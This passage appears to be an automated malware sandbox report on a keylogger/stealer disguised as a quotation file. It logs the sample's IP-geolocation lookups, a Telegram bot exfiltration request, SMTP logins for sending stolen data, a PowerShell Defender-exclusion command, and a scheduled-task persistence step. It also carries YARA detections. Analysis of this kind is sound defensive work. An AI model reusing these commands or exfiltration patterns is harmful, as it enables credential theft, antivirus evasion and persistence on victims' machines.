                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87rK8CJPoPysw5h4OJ5LE5PB2rOv5xTBFSfvxAO0uda6%2BYe%2Be1V0uGHcwr4tcPHZ%2Ff055%2BFcqHK9GLeEYyeLKMB4C2l7xHw7gWpovk0Fti3GqqNTSgzdXU%2FEtUbJ4BKWK%2Bn6L99h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b9eea8729f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1913&rtt_var=725&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1500513&cwnd=169&unsent_bytes=0&cid=9793111a2fe54483&ts=160&x=0"
2025-01-13 12:05:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49741 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:51 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084740
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9K3kWrlI0Pu%2FBmQYeki6cVTA7Wzm3rG0RHxClmr%2BwbeTKjchCteMTxWiDgEy1H5zSNFJX6azRyKZn9o4pMjRFGerU0a8VHQRJ%2FPTqnL40xuMr9K8plhnmGb1ZrBM%2FNts28Hy0jX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541c1c9c243b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1555&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=695587a80020ac7b&ts=138&x=0"
2025-01-13 12:05:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49742 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:51 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:51 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084740
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQD%2FJUsM6xd5oCVb6c5V0ABpEdU%2FUD7ufr2Cp1oNOAO9koEeSfbsWm7vJnzKpA0sJzGfjBz6VfrncOOyjm5fdn6LrgxA2MBd%2F%2BfuVkBiQUCoeuDzNGd56VL2eRx%2FnkaZZAuVwYcD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541c32f9bc34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1527&min_rtt=1459&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=181&unsent_bytes=0&cid=ddd2e81d499cc3da&ts=138&x=0"
2025-01-13 12:05:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49746 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:52 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:52 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:52 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084741
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b515Z%2BQvJ%2FUGuEFsUrbdY3Ri5OYAA1RNkI7t1bunPfBW%2FI%2FjD8G9j%2FHbeJl8uFzYkxRUBnxBZKH3ckztSHsO8xHwGnXhsyIJ0sLFyvKsYvffENNJ0vbgN%2Fs1wfW3vKtprQeYjzy9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541caedb90f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1596&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1680092&cwnd=221&unsent_bytes=0&cid=2826dcf0916a4bf4&ts=135&x=0"
2025-01-13 12:05:52 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49747 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:52 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:52 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:52 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084741
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFg5sVs%2FSY1iGVg2zpoSh4RKkVOjxYIqrAp2W%2Fdmk3GXuQEHqhVN92t%2BOMMAl%2BnT6pKrjzn6GAnGZ9ao76Gy2lYHHjzkojjSU5lhPkS%2Fqs40KCjwTlnG02l26BLJRPwPtDLFQ40L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541cc7ec3c34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1406&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=181&unsent_bytes=0&cid=8423f9fa508f4eb1&ts=183&x=0"
2025-01-13 12:05:52 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49749 | 149.154.167.220 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:53 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:53 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 12:05:53 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49750 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:53 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084743
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hy%2BNbJii2LhAeC%2BeTGJKrfcz5FiLLnzlrUvaxJLmo6aHUtOhysNATogbGLc5teCiurIWsTbvrG%2FNrEHunu7WxhvBVRW0JAoYJpTgkzqLNIE3V%2B%2FjVAIBiqbn7pMqKw0%2BaqAfxuLX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541d3dcc243b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1539&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1885087&cwnd=203&unsent_bytes=0&cid=7cd7e484f4aa3d19&ts=144&x=0"
2025-01-13 12:05:53 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49751 | 149.154.167.220 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:54 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:54 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:54 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 12:05:54 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 13, 2025 13:06:00.032485008 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 13, 2025 13:06:00.032660007 CET | 49752 | 587 | 192.168.2.8 | 208.91.199.223 | EHLO 179605
Jan 13, 2025 13:06:00.182775974 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Jan 13, 2025 13:06:00.183831930 CET | 49752 | 587 | 192.168.2.8 | 208.91.199.223 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 13, 2025 13:06:00.335897923 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 334 UGFzc3dvcmQ6
Jan 13, 2025 13:06:00.777559996 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 13, 2025 13:06:00.777909040 CET | 49753 | 587 | 192.168.2.8 | 208.91.199.223 | EHLO 179605
Jan 13, 2025 13:06:00.929347038 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Jan 13, 2025 13:06:00.930090904 CET | 49753 | 587 | 192.168.2.8 | 208.91.199.223 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 13, 2025 13:06:02.463587999 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 13, 2025 13:06:02.464297056 CET | 49752 | 587 | 192.168.2.8 | 208.91.199.223 | MAIL FROM:<director@igakuin.com>
Jan 13, 2025 13:06:02.617162943 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 250 2.1.0 Ok
Jan 13, 2025 13:06:02.617480040 CET | 49752 | 587 | 192.168.2.8 | 208.91.199.223 | RCPT TO:<director@igakuin.com>
Jan 13, 2025 13:06:02.786401033 CET | 587 | 49752 | 208.91.199.223 | 192.168.2.8 | 554 5.7.1 <director@igakuin.com>: Relay access denied
Jan 13, 2025 13:06:04.921638012 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 13, 2025 13:06:04.921943903 CET | 49754 | 587 | 192.168.2.8 | 208.91.199.223 | EHLO 179605
Jan 13, 2025 13:06:05.068191051 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Jan 13, 2025 13:06:05.068413019 CET | 49754 | 587 | 192.168.2.8 | 208.91.199.223 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 13, 2025 13:06:05.082957983 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 334 UGFzc3dvcmQ6
Jan 13, 2025 13:06:05.217729092 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 334 UGFzc3dvcmQ6
Jan 13, 2025 13:06:07.202047110 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 13, 2025 13:06:07.202209949 CET | 49754 | 587 | 192.168.2.8 | 208.91.199.223 | MAIL FROM:<director@igakuin.com>
Jan 13, 2025 13:06:07.349786997 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 250 2.1.0 Ok
Jan 13, 2025 13:06:07.349939108 CET | 49754 | 587 | 192.168.2.8 | 208.91.199.223 | RCPT TO:<director@igakuin.com>
Jan 13, 2025 13:06:07.461673021 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 13, 2025 13:06:07.461899996 CET | 49753 | 587 | 192.168.2.8 | 208.91.199.223 | MAIL FROM:<director@igakuin.com>
Jan 13, 2025 13:06:07.512908936 CET | 587 | 49754 | 208.91.199.223 | 192.168.2.8 | 554 5.7.1 <director@igakuin.com>: Relay access denied
Jan 13, 2025 13:06:07.614909887 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 250 2.1.0 Ok
Jan 13, 2025 13:06:07.615109921 CET | 49753 | 587 | 192.168.2.8 | 208.91.199.223 | RCPT TO:<director@igakuin.com>
Jan 13, 2025 13:06:07.782290936 CET | 587 | 49753 | 208.91.199.223 | 192.168.2.8 | 554 5.7.1 <director@igakuin.com>: Relay access denied
Jan 13, 2025 13:06:09.974858046 CET | 587 | 60445 | 208.91.198.143 | 192.168.2.8 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 13, 2025 13:06:09.978235960 CET | 60445 | 587 | 192.168.2.8 | 208.91.198.143 | EHLO 179605
Jan 13, 2025 13:06:10.130167961 CET | 587 | 60445 | 208.91.198.143 | 192.168.2.8 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Jan 13, 2025 13:06:10.130414009 CET | 60445 | 587 | 192.168.2.8 | 208.91.198.143 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 13, 2025 13:06:14.296427965 CET | 587 | 60445 | 208.91.198.143 | 192.168.2.8 | 334 UGFzc3dvcmQ6
Jan 13, 2025 13:06:16.464901924 CET | 587 | 60445 | 208.91.198.143 | 192.168.2.8 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 13, 2025 13:06:16.465246916 CET | 60445 | 587 | 192.168.2.8 | 208.91.198.143 | MAIL FROM:<director@igakuin.com>
Jan 13, 2025 13:06:16.616797924 CET | 587 | 60445 | 208.91.198.143 | 192.168.2.8 | 250 2.1.0 Ok
Jan 13, 2025 13:06:16.617073059 CET | 60445 | 587 | 192.168.2.8 | 208.91.198.143 | RCPT TO:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:16.787776947 CET58760445208.91.198.143192.168.2.8554 5.7.1 <director@igakuin.com>: Relay access denied

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:07:05:31
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe"
                                                                                                                                            Imagebase:0x2f0000
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5 hash:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                                                                                                                                            Imagebase:0x310000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"
                                                                                                                                            Imagebase:0xa20000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:07:05:33
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                            File size:2'625'616 bytes
                                                                                                                                            MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:07:05:34
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            Imagebase:0x280000
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5 hash:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1660117333.0000000002849000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 39%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true
